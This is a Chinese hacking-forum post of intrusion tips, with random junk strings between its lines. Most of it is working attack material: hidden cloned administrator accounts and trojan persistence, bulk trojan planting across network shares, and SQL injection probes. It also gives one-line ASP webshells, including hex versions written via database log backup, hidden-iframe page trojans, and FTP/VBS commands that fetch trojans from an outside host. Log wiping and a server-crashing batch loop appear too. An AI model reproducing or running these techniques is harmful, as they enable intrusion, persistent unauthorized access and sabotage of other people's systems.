中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
- H/ S& |6 f, N* k- P& O
cacls C:\windows\system32 /G hqw20:R
) n9 D; t( X4 ?8 D5 b0 t9 n
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
7 X0 g* n9 {( I" u; q, |
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
: w1 A' S, ]8 j; \; G+ B" ^
B5 | M3 L p
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
0 Q' {6 l5 |, C! ~. a5 O9 x1 K
0 ]2 j3 h) u5 l0 d' ]/ N
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
9 s* u& L2 n; Y% e. D5 L
* n3 z5 R) h- v: [& F; y
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 _# A$ E6 g; n( `
$ L; [8 X% i' L, R% ?
5、利用INF文件来修改注册表
$ t7 P) S: R& j' a* r! v
[Version]
! S/ r0 e$ C5 J9 f$ {( t/ L$ ~/ n
Signature="$CHICAGO$"
$ k& W q1 E% D+ n+ l$ w
[Defaultinstall]
) m: ]5 I! N% q9 z6 l# X
addREG=Ating
6 L2 l3 I, \, g* @
[Ating]
4 ?8 u0 i- x3 F$ f& b
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
[- B2 {! S t/ z' V
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
6 U' F3 T1 n& ?( M4 [7 }+ b
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
8 c* ?) C! C) {3 V) F0 r
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
, A+ L0 C6 O4 S, }
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
1 B& S/ ]% x" @
HKEY_CURRENT_CONFIG 简写为 HKCC
! d: d w* y. C% o3 W
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
( z! Y4 i G7 S" b2 P+ T$ u5 ]
"1"这里代表是写入或删除注册表键值中的具体数据
& J/ l* z& o' S0 F
4 U& z/ A, V0 M
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
$ q. v" Y j7 Z( U
多了一步就是在防火墙里添加个端口,然后导出其键值
, ~- N& S% J4 q7 U& ~. e$ p
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
. v0 o; p0 D: X# ]) W
8 G: H6 q* b! V! M: U
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
! K6 E% h3 B6 d1 d( B- d. U
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
/ }3 t( l" G# H" f* ^! o( K* D8 O$ _
* @0 N- g+ r! \/ e
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
# E* h( w0 U2 f7 [+ ~
* \. O) t0 Z& n$ m& K/ N
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
) y0 ?% ^$ T1 i! j: P. a
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
; Z. g/ s# L* R( w2 `
+ l, ?# B7 d) ]9 _) |% D
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
) V. D5 F* J- N$ Q% Q& u, d
C0 P; {( p {; g
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) y; `/ E. ~3 g. \+ u9 B
用法:xsniff –pass –hide –log pass.txt
1 E3 D4 z6 R A! T4 E2 S: F
, V; C1 z& | I" [6 p
12、google搜索的艺术
! a$ G! p& r2 W! o5 C0 x
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
3 m8 [; L% i* V: z9 m2 r0 B
或“字符串的语法错误”可以找到很多sql注入漏洞。
# q, g" z; t% J! U+ @3 `5 D# J
+ s+ V7 f+ {1 F' Z! W; ^* H
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
8 s8 R# N e" j
" \9 d: w6 y# Y: [ X5 l
14、cmd中输入 nc –vv –l –p 1987
9 T! p4 p9 ]5 E1 X
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
+ G2 A7 P' _7 ^1 z
7 q7 Y. e; B7 I3 ~! b
15、制作T++木马,先写个ating.hta文件,内容为
7 ]4 L7 L* B$ p" J
<script language="VBScript">
/ b `" J& N- J7 p Q, o! `. M
set wshshell=createobject ("wscript.shell" )
" P2 ^: l4 b* h7 J2 H- z. A
a=wshshell.run("你马的名称",1)
2 f0 S% X9 ~+ S9 ]
window.close
* I8 ~$ S- g3 ~7 a
</script>
- T5 z h; q$ v4 o9 g
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 k# g' F8 B2 N4 q6 ^% _9 x8 L
6 R: B! \' j3 F; A! J- F7 }0 L
16、搜索栏里输入
- S) Y9 z, W( ^+ I
关键字%'and 1=1 and '%'='
8 z7 _0 W) D, N7 C* o
关键字%'and 1=2 and '%'='
7 p6 X; U; `3 P% `! [* H
比较不同处 可以作为注入的特征字符
- Q: c; Y! l9 X$ S+ O
* W# Z& I3 Z- H8 a
17、挂马代码<html>
, n9 V/ g- T" D' z8 w! Z. q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) P9 |9 s% z1 r/ i* r
</html>
) i* O- T+ q8 Y Q& v# Y! y
6 s- Z" S. P/ H
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
6 j2 Z% v% ^$ W9 m! I& O" b9 _
net localgroup administrators还是可以看出Guest是管理员来。
& l! w) i; k8 X
) z I+ y$ z7 I7 i* \
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
. Z! |2 H5 Q4 K" k) @8 Y5 A, V
用法: 安装: instsrv.exe 服务名称 路径
9 P% K0 I# A( Q+ Q! c
卸载: instsrv.exe 服务名称 REMOVE
9 C8 U4 G. T) r8 T( _
4 V1 `) d C/ T; q; @/ L2 ~5 R
' Q* h+ z! o0 i4 \7 u
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
+ h w/ `- D: B2 {* B
不能注入时要第一时间想到%5c暴库。
. F" j' Q% V; `# r* b% c
; Z/ W$ B! S' p, @
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
+ H4 E! R5 s5 ^* Q. W
. b1 |% T" X5 V" m# J' n
23、缺少xp_cmdshell时
# U+ n& x$ m8 p" Y0 g" M
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
% [) y7 T, p. q! X7 s
假如恢复不成功,可以尝试直接加用户(针对开3389的)
4 ]! ^ d* J: `3 s% q
declare @o int
" |8 U0 ]2 r W$ r, S( l
exec sp_oacreate 'wscript.shell',@o out
8 x% a' H+ q& s- z% M) |, m
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' }& e8 I( n* [6 u* u
( X" u- \4 I! R! t$ O4 H# d3 u" W9 i
24.批量种植木马.bat
7 o( |, ~6 P8 [2 d* [
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
7 z. z! F2 Q: D, B* ?- [% I+ o
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
, ~7 X7 p- @) P* z* p
扫描地址.txt里每个主机名一行 用\\开头
, ?/ Z8 A/ R$ o0 R
; o1 S( E" ]' u4 B
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
6 h, t/ G) k% f1 _
9 q1 y; t2 i r' H
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" x1 z0 Y; B8 G7 A; {) Q
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
1 ?; U$ h# b6 \! |1 h# C% ]
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 G5 Q+ I5 j5 D6 {% n. @5 H
' m! q _$ b) I6 Q( k
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
: Z, S5 }7 z$ ?- ^
然后用#clear logg和#clear line vty *删除日志
7 Q7 c1 X( E( u, M- X' d
0 f4 O" _- r$ V7 W1 z( J3 F$ ?
28、电脑坏了省去重新安装系统的方法
: M ~" j! d" ^3 @
纯dos下执行,
& ?4 V' p: [" ^3 x! w7 Y4 I, r
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
. D+ ?. o6 U- h# y% {
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
8 v1 C& `0 l, _% L
& U8 Y/ l; D8 A6 Y
29、解决TCP/IP筛选 在注册表里有三处,分别是:
& J8 ?$ J- }% n& K" _
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
: h; p4 @- v2 _! D9 V1 e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, g8 \5 x2 D% v7 q0 D8 z! F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' W {6 g/ S& Q! L; i, _: D
分别用
% j" t: R1 h$ c
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 H! i# z' [* \5 [
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) _5 \6 e6 E$ K4 u2 i7 i) n2 x
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# H3 l, W; Q, E# f, w
命令来导出注册表项
, s( F# z' {6 H! O& Y: c2 k
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
% K& T8 N7 V- Y- N( N# e; w0 k
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
% @. l7 _0 u7 N4 Z b8 l# U
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
$ t! W0 x- y- E4 B t8 Y
" |8 \ c' J; b* A& C1 g. f: g
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
3 J9 H" k9 \9 d
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 _; i+ ^% G7 p6 ]( A
; q- P# Q0 x$ V. V
31、全手工打造开3389工具
* l" z# J; x2 P3 D: y/ \) x8 I
打开记事本,编辑内容如下:
( S. A: E5 L5 T- P4 o# d: q6 r/ j
echo [Components] > c:\sql
: @* K& t! b8 F. c) t
echo TSEnable = on >> c:\sql
- G2 A1 q: G! ^/ z: q4 ?. s/ }
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
" g+ q% n0 @: @, J! D: A( Z
编辑好后存为BAT文件,上传至肉鸡,执行
+ i: {- i2 S6 E% t7 q: G
7 ?4 S9 d6 |$ |
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
: ^' M$ D5 z# e% `
4 o e e+ E% d2 H3 w
33、让服务器重启
. @% `/ o/ n$ B" G6 B# [! `
写个bat死循环:
8 f, i" l' _7 {$ n0 b: ~
@echo off
3 K* g T- D1 R! B
:loop1
- e4 y5 v6 C1 c( w
cls
% s1 {9 O) D0 ?
start cmd.exe
! c }! l7 C8 H' q4 n1 H
goto loop1
7 E6 c1 `8 x. @2 y9 T, A* e/ a) J
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
; W% g% T6 ^8 E, H( F5 d( } H K4 [
, ^2 t& c' e& c" J7 M+ \( B
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
/ Y& C+ ~0 Y- p' E, k3 e& z
@echo off
; b R8 N: b7 ^7 `* W$ u+ x/ d9 [
date /t >c:/3389.txt
6 c" J" d' y1 m3 S9 a
time /t >>c:/3389.txt
& _* | s- [" m" b$ `$ E6 \
attrib +s +h c:/3389.bat
" O7 f( F/ M7 Q, g& Z6 F
attrib +s +h c:/3389.txt
! i7 e, A1 M0 j
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ \+ G- p' M; [7 A
并保存为3389.bat
! b- k* J9 k/ F+ q
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
1 F, @: K- K" D
# i [+ `7 f& R7 y
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* s; A, T M5 s+ p+ ?$ J: l
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
: G9 l1 F3 I& T7 I
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
w4 B4 ^' ]2 {5 V P) i, i
* b, P) c# J. B' W: X+ v! x. O5 }
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
/ @+ G: y/ @- l# q I
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
" j0 \$ }$ b V1 q# T$ ?2 ]
echo 你的FTP账号 >>c:\1.bat //输入账号
5 K2 H' ^5 r; G7 {: V
echo 你的FTP密码 >>c:\1.bat //输入密码
+ w: p3 J4 p5 w" }
echo bin >>c:\1.bat //登入
- h5 v% J9 F J3 S3 d# x
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
4 T) X+ k6 D( d5 U5 w4 W d* x, x0 K
echo bye >>c:\1.bat //退出
* N+ I9 i, t0 k/ {2 h4 T- ]& v
然后执行ftp -s:c:\1.bat即可
A$ _; Z8 S$ G( Q9 Y
# L: C$ d& q' @
37、修改注册表开3389两法
! P) P0 L* _9 J' H7 @9 ]
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
- T5 {3 j4 J1 f% T4 r7 a
echo Windows Registry Editor Version 5.00 >>3389.reg
6 s+ ^' C: O; j0 G7 g% t
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
5 ?1 W$ R4 |3 ^ O( A
echo "Enabled"="0" >>3389.reg
5 @' j4 Q8 ~7 B* m5 y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
" O& @2 F% N5 T" F! n* s
NT\CurrentVersion\Winlogon] >>3389.reg
+ E! _7 E$ c+ u0 S. _0 L) A$ B
echo "ShutdownWithoutLogon"="0" >>3389.reg
2 }# g1 b5 s' b9 S/ }
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
" ?3 j. r) i0 K
>>3389.reg
" P2 z$ b* x' M$ h. D
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% J" s! ?) v! r9 g. o: F5 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 L) t2 [! G7 L+ j- W
>>3389.reg
. s4 w2 T. ]7 q* _% Q, p
echo "TSEnabled"=dword:00000001 >>3389.reg
" q) n5 Q& B8 ]. ]5 @5 x' A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
l, l. X8 ?1 I6 h- ^' ]" N1 N0 y# d
echo "Start"=dword:00000002 >>3389.reg
( {( Z$ G, G( m j5 K+ u& S9 h- Y% {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
, P" B" ~/ h" \6 y1 E3 [
>>3389.reg
9 i3 h7 O! q7 n4 ?" v
echo "Start"=dword:00000002 >>3389.reg
& N% @5 f0 |" y N6 |- X
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- k! `+ F i& `
echo "Hotkey"="1" >>3389.reg
- N% ~9 T* k. P! w. z% F( S& Y) r6 U' r8 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 ~4 V- t4 t& F2 a
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
( t/ ]& a& _# H1 o( [$ O
echo "PortNumber"=dword:00000D3D >>3389.reg
* x* R7 K1 c7 b7 _9 w6 K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 o: ^! o& z/ {
Server\WinStations\RDP-Tcp] >>3389.reg
- ~3 s9 [ g( |' t5 G
echo "PortNumber"=dword:00000D3D >>3389.reg
. p E$ s5 h; V5 ~
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
6 N& T# t- S. Q, j
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
4 w- h, ]$ e5 W
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
$ m: L( N$ b2 N- C
(2)winxp和win2003终端开启
& q* n7 q9 ~' o& n) c! p- z
用以下ECHO代码写一个REG文件:
& o# Y% O- Q* k9 s- k, S' t
echo Windows Registry Editor Version 5.00>>3389.reg
: x @! q; m5 m8 z4 a5 Z$ ^' Z6 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 M7 w T1 ]- z7 [, ]0 Q7 V
Server]>>3389.reg
6 [/ V; v# n2 @* \
echo "fDenyTSConnections"=dword:00000000>>3389.reg
& V8 w ~; h9 i* q! Q" z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 @3 f$ ?% w2 t) s
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
% i& p4 o; F+ a% I4 l7 a% y
echo "PortNumber"=dword:00000d3d>>3389.reg
1 r" g4 y) E* \, ?# \. ~4 B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) N7 \# ?2 u4 r
Server\WinStations\RDP-Tcp]>>3389.reg
f7 q0 @8 l7 n# O9 O2 d: L2 q0 m
echo "PortNumber"=dword:00000d3d>>3389.reg
0 w. ]+ k$ O4 ~
然后regedit /s 3389.reg del 3389.reg
& Y. ~# n2 V: c) S+ f8 E9 Z
XP下不论开终端还是改终端端口都不需重启
* q. o6 c3 {) b5 G# D7 R
! b k G' q+ v. A& q0 H
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
4 R- A. t$ Q/ g0 g2 P
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& n& y5 r5 Q# b( |9 [7 i% ^3 z& H6 @
, H) ]" |. B' U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
) ?: L/ t! N$ M% z* B
(1)数据库文件名应复杂并要有特殊字符
8 R j* V: k+ m6 u5 S
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
1 c4 ]& D0 l0 G/ H& D5 b/ ~9 c2 X9 j* O
将conn.asp文档中的
/ X) K( Q% \" _# {
DBPath = Server.MapPath("数据库.mdb")
4 i5 \+ P( h& E) y/ m4 e V
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
0 a$ ]0 G: E# `$ z
; d, p* }8 B3 c S
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
! y, @. ?# Y) _! p# ~
(3)不放在WEB目录里
- \; ^ S; u i4 b+ b
# k- w+ j/ c6 ` I
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
$ R) n5 T8 j1 v( F
可以写两个bat文件
" ^& k/ c1 G* h( |! R6 C& Y
@echo off
( I- a3 [- [& ^! `
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
2 C; T3 }! q4 e+ M) S7 q
@del c:\winnt\system32\query.exe
I4 h$ |0 H" M5 @5 P
@del %SYSTEMROOT%\system32\dllcache\query.exe
) P2 G& I6 S2 K4 K ^9 n% F6 u
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
, j8 u9 ]- V1 T) M
' p2 H! I9 J7 [8 @5 n3 I
@echo off
; k5 n- m+ j1 C6 q, u8 Z! I9 t8 d q# T
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
% H2 n" b* r8 L4 g i
@del c:\winnt\system32\tsadmin.exe
' C! y' k! s+ ]! }( @
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
0 U E$ O8 T. |5 r' y+ n
9 b7 T# m1 O8 ~- c d( t3 X
41、映射对方盘符
4 Z$ Z7 |' r( G6 h- ]
telnet到他的机器上,
4 C7 n8 M* O' ]) X/ f8 ]
net share 查看有没有默认共享 如果没有,那么就接着运行
* y& F- x* W4 T5 _
net share c$=c:
0 F/ D Q C$ G' @& p" y* b
net share现在有c$
0 n5 S, ^: W3 U. ~5 S/ L
在自己的机器上运行
/ @& [4 A" b B3 q" z: M* r$ y
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
' r" h0 {3 k1 y; e. l1 A; Q) I; \
# I n/ u% a w+ X/ q
42、一些很有用的老知识
6 G3 U9 S4 m$ z# n: w
type c:\boot.ini ( 查看系统版本 )
; B7 B T& i' T
net start (查看已经启动的服务)
! E: C- s+ G: h9 I1 _0 F, J$ a' O
query user ( 查看当前终端连接 )
( H5 q/ r \) q/ g- g l; W
net user ( 查看当前用户 )
5 P s- N! k4 p4 |& g
net user 用户 密码/add ( 建立账号 )
3 C R8 h" E& N$ D1 p( @
net localgroup administrators 用户 /add (提升某用户为管理员)
; B6 T4 ^$ U% B5 v1 P
ipconfig -all ( 查看IP什么的 )
5 Y$ y3 U5 m* o' z! P; s3 r
netstat -an ( 查看当前网络状态 )
: V. n0 ?9 l6 }
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
3 a1 z9 B' \. Y: K/ {' P, Z+ V
克隆时Administrator对应1F4
+ n, Q. b/ X4 N6 G% |+ M
guest对应1F5
3 j) J& }- W/ [% x5 ]
tsinternetuser对应3E8
9 o B5 x! U7 t6 u+ M4 n2 n
" x6 d8 L' F$ r" j. x- `; ]
43、如果对方没开3389,但是装了Remote Administrator Service
' [0 a& q- F! o& b- o3 e
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
; f: v- x( R# R3 F* @+ h" Y
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
8 q; A7 i2 M" J% u, z( h
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
5 O0 E% k- j* K
) q& L+ y4 J/ H6 ^' `
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
/ T, U, Y1 o9 `5 ^. D$ {
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
- p( X; ]' ?7 N9 C* c0 J# ]
@$ X' W1 l2 p" d
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
) Q$ C' ?* [# D- H% L0 |
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* }* T- X7 j! {5 S4 q+ B8 z/ [
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
; ?7 k( N2 Z0 c; R' U' P, L
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
6 r8 J% h6 k" x
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
9 l0 q% m1 m$ u- v u& o
(这是完整的一句话,其中没有换行符)
. ?2 g7 j, z$ C5 z, o% q1 k0 y4 u) y
然后下载:
1 i% P" x, s8 H4 X! ?* A; c t
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
* a5 J; `2 W4 h
3 Y% C! `. a4 n1 K% ^
46、一句话木马成功依赖于两个条件:
# _3 K' m+ W2 R2 y
1、服务端没有禁止adodb.Stream或FSO组件
+ A9 r% p' W$ ~/ d9 P( o+ c
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
! j2 F K1 u* h6 w
; N4 J8 N. F, K5 n M9 V
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
2 S! d5 g. _2 f8 o8 t& Y& ^
;alter database utsz set RECOVERY FULL--
" r$ ^9 A! e3 B: V: I% B
;create table cmd (a image)--
8 z" F+ i0 @$ y9 \0 R
;backup log utsz to disk = 'D:\cmd' with init--
! {# D0 z* U5 m; H* {, l3 Q7 E" I
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
. O3 O9 I+ |' N9 `7 o0 c
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
2 o4 q& u& O% A6 _- |. Z' ]; S) M
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% A$ K: i7 H8 C" ~+ X
1 U" B$ d' X. C1 \2 o) o( t
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
. A. ?- ~! @9 k" f6 T" \
" H7 ^! E- M8 ^' z; y! u
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
/ K' N5 U5 s: g
所有会话用 'all'。
+ J) j2 G+ f4 ^6 P2 j; }' x
-s sessionid 列出会话的信息。
3 s' p. d& }) x' D# o4 h+ C- X
-k sessionid 终止会话。
4 Y, g/ l) K% X6 p% u
-m sessionid 发送消息到会话。
( S% e$ p8 k' X
$ b$ x( W) ?5 z0 S/ f) z
config 配置 telnet 服务器参数。
" m; i7 K' l; S' ~
0 E6 H' ]2 j6 e1 C# Q( g
common_options 为:
2 B5 N% J- I: u
-u user 指定要使用其凭据的用户
2 Z0 F1 F( K- b9 t2 t& e3 a
-p password 用户密码
, R* x% Y9 W8 w6 o
6 m/ U! C* q/ ^" N
config_options 为:
3 K n+ C5 u# N0 F
dom = domain 设定用户的默认域
8 P4 ` \+ j" i' _$ L
ctrlakeymap = yes|no 设定 ALT 键的映射
% `' P0 s9 a3 u( M- \
timeout = hh:mm:ss 设定空闲会话超时值
7 b1 y: s+ x- a& Z% ^
timeoutactive = yes|no 启用空闲会话。
! x/ a* H( w3 x# F" h4 @9 ~
maxfail = attempts 设定断开前失败的登录企图数。
2 K2 z! A& {" v: |% W, R$ U
maxconn = connections 设定最大连接数。
! M# `" H* S! E1 z0 G1 j
port = number 设定 telnet 端口。
! ], m# `) X `* }" X& V
sec = [+/-]NTLM [+/-]passwd
: E3 S0 w) j8 Y1 L+ g! n
设定身份验证机构
. u" e+ t3 a5 z, y4 u, `* k8 ^
fname = file 指定审计文件名。
; N% x& h3 a4 Q1 U
fsize = size 指定审计文件的最大尺寸(MB)。
: p( K0 x0 D* n6 M
mode = console|stream 指定操作模式。
& a: x4 z# L; H
auditlocation = eventlog|file|both
7 b3 h7 d9 l! ^ H9 ~* t1 f
指定记录地点
7 B7 u" F8 X4 \" r" I
audit = [+/-]user [+/-]fail [+/-]admin
2 L/ Q$ ?! @# g' o
/ E1 e8 Y! f- K% r+ @5 C7 n+ c
49、例如:在IE上访问:
' O/ A2 l0 y: V/ z0 T, ?8 q* |+ ?
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
3 o; T) O; ?+ G: b2 {4 o
hack.txt里面的代码是:
& x7 F- K/ o, d3 X. _6 K5 h
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
* e/ |. ?2 d$ r
把这个hack.txt发到你空间就可以了!
* v: T7 j0 K5 s7 L# j
这个可以利用来做网马哦!
) F8 D4 M: \4 `' W
/ _: |2 ^2 f+ b# ]
50、autorun的病毒可以通过手动限制!
6 U4 R( i0 s3 Q& A
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
8 }! w+ y; O, A0 Z
2,打开盘符用右键打开!切忌双击盘符~
' J$ u: ` j2 y' c/ L
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& X' t5 B1 Z# M6 F' S& w
! v8 P1 o3 P+ t
51、log备份时的一句话木马:
+ i7 T1 c5 S) ~
a).<%%25Execute(request("go"))%%25>
" I9 p" @; y! H- @
b).<%Execute(request("go"))%>
" }+ L( @# B% Z r9 x
c).%><%execute request("go")%><%
